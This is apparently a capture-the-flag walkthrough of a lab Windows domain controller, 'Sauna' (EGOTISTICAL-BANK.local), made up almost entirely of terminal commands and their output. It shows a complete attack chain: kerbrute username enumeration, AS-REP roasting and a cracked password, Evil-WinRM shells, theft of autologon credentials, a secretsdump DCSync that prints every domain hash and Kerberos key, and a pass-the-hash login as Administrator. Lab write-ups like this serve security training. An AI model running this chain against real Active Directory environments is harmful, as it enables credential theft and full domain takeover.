The initial phase takes a long time; most of the work is enumeration. Start by enumerating employee accounts — the company website turns out to be a useful source of names.
root@kali /opt/kerbrute/dist master v1.0.3 ./kerbrute_linux_amd64 userenum --dc 10.10.10.175 --domain EGOTISTICAL-BANK.local --delay 80 --safe -v -t 148 /tmp/logins
2020/03/19 20:27:25 > [!] steven.kerb@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 > [!] scoins@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2020/03/19 20:27:26 > [!] sdriver@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 > [!] btaylor@EGOTISTICAL-BANK.LOCAL - User does not exist
root@kali /opt/dirsearch master ? smbclient -L 10.10.10.175 -U 'egotistical-bank.local\fsmith'
Enter EGOTISTICAL-BANK.LOCAL\fsmith's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
RICOH Aficio SP 8300DN PCL 6 Printer We cant print money
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Thestrokes23 ($krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL)
python3 GetNPUsers.py -dc-ip 10.10.10.175 egotistical-bank.local/ -usersfile /tmp/logins2 -format john -outputfile /tmp/responses.txt
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kali /opt/impacket/examples master cat /tmp/responses.txt ✔ ⚡ 4388 10:43:31
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:3dd2da95be95ab8337aca2d69e61c55c$39389c5553c64b749830594bb8b97709a7ec18ebbb53a522468167ac4919c07d9f8c64a18bee6fe5c50af7e8b9a79747c6c3aff7b897cc3466fa3d5a3a551b00ded67e01f42a7a68dc1883ac1b2e7b1289877e65c7d5642fb62a664c604e806a7969ccba7deb0228487b0c4a1e84f431174024ca98f35a39b99be5fea58ea5b23f75471deeb00f71253db6b025199c88dd1d4279aa8c7182e60ca3fa55f59645dd316ec94d49bc89fa77dc12c4cd3c8485e00bb0ef2abc60e5eacef7d31eba41a511f9cf1a94c9d67e9e1c5eb4db366258199cc2dc47f661c008e5bf58d0a5f856ce0836ea8a2eb50fb9d6781ad293714e7a91ea60805073eb6c617745b86aa9
root@kali /opt/impacket/examples master
root@kali /opt/impacket/examples master python3 lookupsid.py -target-ip 10.10.10.175 fsmith:Thestrokes23@egotistical-bank ✔ ⚡ 4382 10:41:10
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Brute forcing SIDs at egotistical-bank
[*] StringBinding ncacn_np:egotistical-bank[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2966785786-3096785034-1186376766
498: EGOTISTICALBANK\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: EGOTISTICALBANK\Administrator (SidTypeUser)
501: EGOTISTICALBANK\Guest (SidTypeUser)
502: EGOTISTICALBANK\krbtgt (SidTypeUser)
512: EGOTISTICALBANK\Domain Admins (SidTypeGroup)
513: EGOTISTICALBANK\Domain Users (SidTypeGroup)
514: EGOTISTICALBANK\Domain Guests (SidTypeGroup)
515: EGOTISTICALBANK\Domain Computers (SidTypeGroup)
516: EGOTISTICALBANK\Domain Controllers (SidTypeGroup)
517: EGOTISTICALBANK\Cert Publishers (SidTypeAlias)
518: EGOTISTICALBANK\Schema Admins (SidTypeGroup)
519: EGOTISTICALBANK\Enterprise Admins (SidTypeGroup)
520: EGOTISTICALBANK\Group Policy Creator Owners (SidTypeGroup)
521: EGOTISTICALBANK\Read-only Domain Controllers (SidTypeGroup)
522: EGOTISTICALBANK\Cloneable Domain Controllers (SidTypeGroup)
525: EGOTISTICALBANK\Protected Users (SidTypeGroup)
526: EGOTISTICALBANK\Key Admins (SidTypeGroup)
527: EGOTISTICALBANK\Enterprise Key Admins (SidTypeGroup)
553: EGOTISTICALBANK\RAS and IAS Servers (SidTypeAlias)
571: EGOTISTICALBANK\Allowed RODC Password Replication Group (SidTypeAlias)
572: EGOTISTICALBANK\Denied RODC Password Replication Group (SidTypeAlias)
1000: EGOTISTICALBANK\SAUNA$ (SidTypeUser)
1101: EGOTISTICALBANK\DnsAdmins (SidTypeAlias)
1102: EGOTISTICALBANK\DnsUpdateProxy (SidTypeGroup)
1103: EGOTISTICALBANK\HSmith (SidTypeUser)
1105: EGOTISTICALBANK\FSmith (SidTypeUser)
1108: EGOTISTICALBANK\svc_loanmgr (SidTypeUser)
root@kali /opt/impacket/examples master
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 10.10.10.175 --user fsmith -p Thestrokes23
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> dir
Directory: C:\Users\FSmith\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/20/2020 1:07 PM PowerSploit-master
-a---- 3/20/2020 1:18 PM 53760 SauronEye.exe
-a---- 3/20/2020 12:58 PM 7120 WindowsEnum.ps1
Windows Enumeration Script v 0.1
by absolomb
www.sploitspren.com
------------------------------------------
*Evil-WinRM* PS C:\Users\FSmith\Documents>
User Directories
------------------------------------------
Name
----
Administrator
FSmith
Public
svc_loanmgr
User Autologon Registry Items
------------------------------------------
DefaultDomainName DefaultUserName DefaultPassword
----------------- --------------- ---------------
EGOTISTICALBANK EGOTISTICALBANK\svc_loanmanager Moneymakestheworldgoround!
root@kali /opt/evil-winrm master v2.3 evil-winrm -i 10.10.10.175 --user svc_loanmgr -p Moneymakestheworldgoround! 1 ↵ ⚡ 4545 13:32:41
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>
*Evil-WinRM* PS C:\Users\FSmith> gci -Recurse -Filter "user.txt" -File -ErrorAction SilentlyContinue -Path "C:\"
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc_loanmgr\DOcuments> ./winPEAS.exe
root@kali:/opt/SharpSploit/SharpSploit# secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:f0b39206c3b064d1adc35f95e8a6e70c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:2e81c7eb6af46746f2765883f2c49879aa91a107170cf2a6e0abe4f5f593c607
SAUNA$:aes128-cts-hmac-sha1-96:63f3b1af0cadca84269ec7d2ad11bfe3
SAUNA$:des-cbc-md5:104c515b86739e08
root@kali /opt/evil-winrm master v2.3 evil-winrm -i 10.10.10.175 -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff 1 ↵ ⚡ 4569 12:02:57
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>